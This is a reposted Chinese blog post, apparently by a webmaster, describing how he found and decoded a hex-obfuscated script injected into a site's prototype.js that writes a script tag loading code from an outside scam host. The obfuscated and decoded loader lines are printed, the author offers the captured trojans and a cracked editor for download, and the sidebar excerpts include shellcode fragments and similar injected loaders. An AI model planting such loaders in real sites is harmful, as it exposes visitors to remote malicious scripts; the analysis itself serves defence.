解密x64x6fx63x75x6dx65x6ex74木马的全过程

最新推荐文章于 2023-03-16 22:18:05 发布
最新推荐文章于 2023-03-16 22:18:05 发布
阅读量2.8k 收藏
点赞数
文章标签: 解密 服务器 iis javascript 破解 工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/snihcel/article/details/6081375
版权

一、因为最近工作很忙,没有去看服务器,今天一个朋友跟我说ip8000.com、sql8.net中毒了,状况如下,



是一个QQ诈骗广告,于是我想应该是被挂马了上,用基本方法在源码里面搜索了一下没有, 我想不是我IIS中毒了?于是又打开了nz.gdm.cn一样中毒,不过我再打开我服务器其它网站却没有中毒那么就否定了服务器IIS中毒的可能,因为IIS中毒你服务器上都网站状况一样,那么确定是被挂马了。


那么木马又放在那里,木马的源代码又是什么呢?


二、我打开FTP工具,查看了一下最近被改过的文件,如图




于是我其它下载下来,
用工具打开来仔细看了一下,发现其中有一段很奇怪的代码
window["/x64/x6f/x63/x75/x6d/x65/x6e/x74"]["/x77/x72/x69/x74/x65"] ('/x3c/x53/x43/x52/x49/x50/x54 /x73/x72/x63

/x3d/x22/x68/x74/x74/x70/x3a/x2f/x2f/x77/x77/x77/x2e/x71/x71/x76/x69/x70/x2d/x31/x30/x30/x30/x30/x2e/x63

/x6f/x6d/x3a/x33/x31/x35/x38/x2f/x72/x65/x67/x2f/x63/x6f/x64/x65/x2e/x6a/x73/x22/x3e/x3c/x2f/x73/x63/x72/x69

/x70/x74/x3e');




  
这段代码是在prototype.js 这个文件,而这个文件是动易系统中javascript基础类库不应该存这样的代码,肯定是木马无疑了问题这样一个加了密码的代码我们要怎么去看它呢。


三、用百度搜了一下一位仁兄写的详细表示敬意我贴出他的地址http://tech.techweb.com.cn/thread-236233-1-.html
最重要的Uedit32(如果你没有没有关系下面我提供破解中文版供大家下载)




搜索-替换

把/x替换为%,然后用html代码转换功能,解码,
如图




  


四、终于看到庐山真面目了,代码是
window["document"]["write"] ('<SCRIPT src="http://www.qqvip-10000.com:3158/reg/code.js"></script>');
window["document"]["write"] ('<SCRIPT src="http://www.qqvip-10000.com:3158/reg/code.js"></script>');



以上就是解密这个木马的全部过程。
顺便我再把我服务器上找到的那些混蛋留下的木马也提供给大家下载学习,我们要自强不息,努力学习,不要他妈的天天给人强奸,我们可以不懂,但我们不可以不学,有兴趣的朋友欢迎加我的群8775455,希望各位穷光蛋站长们个个有米进,不说了,要去打补丁了。谢谢

点击下载挂马木马仅学习

点击下载UltraEdit简体中文破解版

  
本文来至E学院 原文地址:http://www.ip8000.com/NetworkSecurity/NetworkSecurity/201012/66887.html



snihcel
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Shellcode
tony的专栏
03-31 1071
// windows 下弹计算器的shellcode,貌似不支持windows7及以上版本 // 先记下 shellcode = "" shellcode+="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" shellcode+="\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\x
网页文件被加入恶意百度跳转代码\x64\x6f\x63\x75\x6d\x65\x6e\x74解密
热门推荐
A1452585268的博客
01-14 1万+
前几天,用了tp的框架,后来tp被爆出了漏洞,导致网站被植入了时式彩代码。通过百度搜索进入的用户,直接跳转到这个网站里。今天教给大家怎么解密这种采用eval加密的js代码。 恶意代码源码是这样的: &lt;script&gt;if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="关键词...
JS sojson.vX在线解密工具-附源码
chinasuc的博客
12-17 3715
js在线解密工具,免费使用
一键加密解密工具
mxd01848的博客
03-16 394
为了保护 JS 代码的安全性,经常需要将其混淆以使其难以读取。流浪地球这部电影中的最后一个任务是利用 JavaScript 编写的跳跃引擎搭载太阳能发电机,建造一个能够推动地球离开太阳系的新引擎。同样的,对于 JS 代码来说,混淆可以让它们更难以读取和理解,从而保护它们的安全性。总体来说,混淆和解密 JS 代码需要一定的技巧和经验,但它可以在一定程度上保护您的代码。以下是一个简单的 JS 混淆和解密示例,以流浪地球电影中的跳跃引擎为主题。解密代码中,我们还原了原來的代码,并使用。变量名进行混淆的结果。
纯js加密简单分析
weixin_44234050的博客
04-22 1934
['sojson.v4']["\x66\x69\x6c\x74\x65\x72"]["\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72"]( ((['sojson.v4'] + [])["\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72"]['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']['\x61\x70\x70\x6c\x79'](null, "108w111.
微擎 goto + 混淆加密, 反向解密思路
搬砖小胖纸的搬砖记录
06-19 3902
这样就很难受,google 了一下有很多微擎 解密 的网站,都是按 kb 收费的,emmm,犹豫了一下没有剁手。 想着自己学着玩也没人给报销,并且这次掏钱包解决了,下次遇到还是不会。。。 索性研究研究吧。找了挺多相关帖子,奈何水平有限,那些文章提到的工具之类都不会用。只好用笨方法。 搜索论坛关键词,还没有人发过类似帖子。倒有不少求助解密的。授人以鱼不如授人以渔。 我这算是抛砖引玉吧,希望能有大佬写出脚本自动执行。节省人工。
php文件内大量的goto解密.zip
10-01
在本地或线上搭建一个php运行环境(即能跑你的php代码),然后把在此下载的几个文件夹放于该环境下,把待解密的php置入decodeFile目录即可。
浅谈html转义及防止javascript注入攻击的方法
10-20
HTML转义是一种将特殊字符转换为它们等价的HTML实体的过程,以防止浏览器将这些字符解释为HTML标签或特殊指令。当用户输入包含HTML标签的数据时,如果不进行转义,浏览器会尝试执行这些标签,这可能导致意外的行为,...
一段超强的javascript代码解密方法
01-19
代码如下:function Get(){ var $qL1 = new window[“\x44\x61\x74\x65”]() $qL1[“\x73\x65\x74\x54\x...(window[“\x64\x6f\x63\x75\x6d\x65\x6e\x74”][“\x63\x6f\x6f\x6b\x69\x65”]) var JHasS3 = “\x
东芝Qosmio X75游戏本评测.docx
09-27
东芝Qosmio X75是一款专为游戏爱好者设计的高性能笔记本电脑。这款17英寸的游戏本在硬件配置上非常出色,搭载了第四代Intel Core i7-4700MQ处理器,配备了NVIDIA GeForce GTX 770M显卡,拥有3GB的显存,确保了流畅的...
js加密工具【很实用】附演示代码
06-22
保护您的js代码; 演示代码: function Save_View() { var idx =document.getElementById("idx");//项目ID var xmmc =document.getElementById("xmmc");//项目名称 var szqy =document.getElementById("szqy");//所在区域 var kfsmc =document.getElementById("kfsmc");//开发商名称 var xxdz =document.getElementById("xxdz");//详细地址 var zjzmj =document.getElementById("zjzmj");//总建筑面积 if(xmmc.value=="") { alert("请填写项目名称"); xmmc.focus(); return false; } if(kfsmc.value=="") { alert("请填写开发商名称"); kfsmc.focus(); return false; } if(xxdz.value=="") { alert("请填写详细地址"); xxdz.focus(); return false; } if(zjzmj.value=="") { alert("请填写总建筑面积"); zjzmj.focus(); return false; } } 加密后代码: function Save_View() { var Jy_eNph1 =window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64"]("\x69\x64\x78");//项目ID var E2 =window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64"]("\x78\x6d\x6d\x63");//项目名称 var gEXwty3 =window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64"]("\x73\x7a\x71\x79");//所在区域 var jH4 =window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64"]("\x6b\x66\x73\x6d\x63");//开发商名称 var bbSRLoGP5 =window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64"]("\x78\x78\x64\x7a");//详细地址 var dY_boQtws6 =window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64"]("\x7a\x6a\x7a\x6d\x6a");//总建筑面积 if(E2["\x76\x61\x6c\x75\x65"]=="") { window["\x61\x6c\x65\x72\x74"]("\u8bf7\u586b\u5199\u9879\u76ee\u540d\u79f0"); E2["\x66\x6f\x63\x75\x73"](); return false; } if(jH4["\x76\x61\x6c\x75\x65"]=="") { window["\x61\x6c\x65\x72\x74"]("\u8bf7\u586b\u5199\u5f00\u53d1\u5546\u540d\u79f0"); jH4["\x66\x6f\x63\x75\x73"](); return false; } if(bbSRLoGP5["\x76\x61\x6c\x75\x65"]=="") { window["\x61\x6c\x65\x72\x74"]("\u8bf7\u586b\u5199\u8be6\u7ec6\u5730\u5740"); bbSRLoGP5["\x66\x6f\x63\x75\x73"](); return false; } if(dY_boQtws6["\x76\x61\x6c\x75\x65"]=="") { window["\x61\x6c\x65\x72\x74"]("\u8bf7\u586b\u5199\u603b\u5efa\u7b51\u9762\u79ef"); dY_boQtws6["\x66\x6f\x63\x75\x73"](); return false; } } 变量完全是随机的,很好很实用。 喜欢就下载喽··~~
乌鲁木齐天融环保设备有限公司1x75t-h及2x35t循环流化床锅炉烟气脱硝治理工程设计方案(氨水PLC).doc
06-29
"乌鲁木齐天融环保设备有限公司1x75t-h及2x35t循环流化床锅炉烟气脱硝治理工程设计方案(氨水PLC)" 标题解释: 该项目的标题是乌鲁木齐天融环保设备有限公司1x75t-h及2x35t循环流化床锅炉烟气脱硝治理工程设计方案,...
骗过网页同服务器的时间验证,网站被黑的假象--ARP欺骗之页面中加入一段js
weixin_30647489的博客
07-31 378
昨天晚上发现访问我的网站的时候网页代码html的前面多了一串js代码。刚开始以为网站被黑了,赶紧到服务器上查看所有文件是否带有这串js代码,搜索结果没有,而且服务器也没发现被入侵的痕迹。于是只能从这段代码入手,我下载这个js开发发现是下面一段代码:window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("...
linux下递归遍历目录下的文件,实现批量替换
weixin_34192732的博客
10-14 273
今天刚吃饭的时候,被报告服务的代码全被挂马,经查证好多js的最后被被加入了如下 window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"] ("\x3c\x73\x63\x72\x69\x70\x74 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\...
JavaScript加密解密原理详解
GBM2014的博客
09-14 309
VBS,VBScript代码写久了,回到JavaScript有点不习惯了……文章开始前先附上“网页加解密”很全的工具,可以到我网盘下载http://ycosxhack.ys168.com/,“黑客工具”目录,文件名为“网页加解密.rar”。 要继续看下面的文字首先记住两个原理: 原理1:无论源码被如何加密,被如何限制,最终都将还原成浏览器可以识别的HTML代码。原理2:解铃还须系铃人...
linux 目录递归遍历,linux下递归遍历目录下的文件,实现批量替换
weixin_35054319的博客
04-28 293
今天刚吃饭的时候,被报告服务的代码全被挂马,经查证好多js的最后被被加入了如下window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x73\x63\x72\x69\x70\x74 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x63\x6f\x75\x6e...
js如\x6C\x69\x6E\x65\x63\x68加密代码解压方法
weixin_34376562的博客
10-20 1万+
2019独角兽企业重金招聘Python工程师标准>>> ...
js 中 \x75\x65\x73\x74 这种 是什么编码
最新发布
11-26
引用[1]中的代码是Python代码,而不是JavaScript代码。在Python中,\x表示后面跟着两个十六进制数字,表示一个字符的ASCII码。例如,\x75表示ASCII码为117的字符u。在JavaScript中,\x不是合法的转义字符,因此\x75\x65\x73\x74会被当作普通的字符串处理。如果想要在JavaScript中表示一个字符的Unicode编码,可以使用\u加上四个十六进制数字,例如\u0075表示字符u的Unicode编码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值